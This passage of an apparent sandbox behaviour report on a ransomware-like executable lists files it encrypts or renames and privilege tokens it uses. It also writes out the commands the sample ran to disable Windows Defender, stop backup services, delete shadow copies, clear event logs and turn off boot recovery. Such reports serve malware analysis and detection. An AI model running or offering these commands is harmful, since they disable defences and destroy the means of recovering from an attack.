| File opened for modification | C:\Program Files\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\TipRes.dll.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\ant-javafx.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_TfdWUg_-QVM0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_0DpSyFBvTQI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_fYvXB4RS-fk0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_H3rcXbO1J1U0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\msado21.tlb | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_KO9y7OqPmLk0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_rT7wpN4jG-k0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_41MPRQXwRsI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_F-Q-mJ4MBuI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msdaprsr.dll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz__MLx__lZ5Zg0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_SNItfojPm0s0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_SBugtfJOhoc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_Jd-hXxat34Q0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred.xml | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ja-JP\ShapeCollector.exe.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_HE8XNownmzQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_DBJSiSh_Zj00.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_xA3Wf3WZ0Cc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_Lh91f3wcJzs0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_vlMgWWpxoig0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_es.properties.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_vfWpm8dVIrY0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_aknHU87gUMA0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_wbBCODoCiIM0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_a7ZtRLX6kII0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_3jGrDWtw85g0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msadcor.dll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_aZ-5-eaxD7E0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\ja-jp-sym.xml | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe
"C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12cc1" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12cc1" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12cc1" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 52.109.12.20:443 | tcp | |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
Files
memory/480-115-0x0000000000000000-mapping.dmp
memory/1176-116-0x0000000000000000-mapping.dmp
memory/2324-117-0x0000000000000000-mapping.dmp
memory/636-118-0x0000000000000000-mapping.dmp
memory/908-119-0x0000000000000000-mapping.dmp
memory/3672-120-0x0000000000000000-mapping.dmp
memory/1812-121-0x0000000000000000-mapping.dmp
memory/3976-122-0x0000000000000000-mapping.dmp
memory/2244-123-0x0000000000000000-mapping.dmp
memory/1776-124-0x0000000000000000-mapping.dmp
memory/1760-125-0x0000000000000000-mapping.dmp
memory/856-126-0x0000000000000000-mapping.dmp
memory/600-127-0x0000000000000000-mapping.dmp
memory/2672-128-0x0000000000000000-mapping.dmp
memory/1248-129-0x0000000000000000-mapping.dmp
memory/4012-130-0x0000000000000000-mapping.dmp
memory/1196-131-0x0000000000000000-mapping.dmp
memory/2416-132-0x0000000000000000-mapping.dmp
memory/3992-133-0x0000000000000000-mapping.dmp
memory/1140-134-0x0000000000000000-mapping.dmp
memory/1480-135-0x0000000000000000-mapping.dmp
memory/1520-136-0x0000000000000000-mapping.dmp
memory/1840-137-0x0000000000000000-mapping.dmp
memory/3984-138-0x0000000000000000-mapping.dmp
memory/2308-139-0x0000000000000000-mapping.dmp
memory/3960-140-0x0000000000000000-mapping.dmp
memory/2996-141-0x0000000000000000-mapping.dmp
memory/1564-142-0x0000000000000000-mapping.dmp
memory/1276-143-0x0000000000000000-mapping.dmp
memory/1056-144-0x0000000000000000-mapping.dmp
memory/2172-145-0x0000000000000000-mapping.dmp
